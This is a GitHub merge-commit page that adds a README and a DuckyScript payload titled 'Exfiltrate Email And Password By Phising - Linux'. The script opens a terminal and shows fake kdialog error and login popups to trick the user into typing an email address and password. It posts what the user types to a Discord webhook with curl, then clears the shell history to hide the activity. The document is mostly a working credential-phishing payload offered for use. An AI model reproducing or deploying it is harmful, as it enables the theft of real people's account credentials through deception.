Merge pull request #261 from aleff-github/patch-15

Exfiltrate Email And Password By Phising - Linux
pull/287/head
Dallas Winger 2023-03-27 07:19:38 -04:00 committed by GitHub
commit ea680f29e7
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 63 additions and 0 deletions

View File

@ -0,0 +1,28 @@
# Exfiltrate Email And Password By Phising - Linux ✅
A script used to exfiltrate the email and the email password by a popup (KDE/kdialog based) phishing based on linux systems.
**Category**: Phishing, Credentials
## Description
A script used to exfiltrate the email and the email password by a popup (KDE/kdialog based) phishing based on linux systems.
Opens a shell, get the email and the email password by a popup, send the input to a Discord webhook.
## Getting Started
### Dependencies
* Internet Connection
* Discord webhook
* KDE/kdialog based
### Executing program
* Plug in your device
### Settings
* Set the Discord webhook

View File

@ -0,0 +1,35 @@
REM ###########################################################
REM # |
REM # Title : Exfiltrate Email And Password By Phising |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Credentials, Phishing |
REM # Target : Linux |
REM # |
REM ###########################################################
REM Requirements:
REM - Internet Connection
REM - Discord webhook
REM - KDE/kdialog based
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### POPUP SECTION ####
REM REQUIRED - Provide Discord Webhook - https://discordapp.com/api/webhooks/<webhook_id>/<token>
DEFINE WEBHOOK example.com
STRING WEBHOOK_URL="
STRING WEBHOOK
STRING "
ENTER
DELAY 500
REM All-in-one is important
STRING $(curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"$(echo $(kdialog --sorry 'Email incorrect.\n Will not connect to server, please retry.'; kdialog --title 'Email \n Put your email address to connect yout account.' --inputbox 'Email:'; kdialog --title 'Email Login' --password 'Email Password:';))\"}" $WEBHOOK_URL); history -c; exit;
ENTER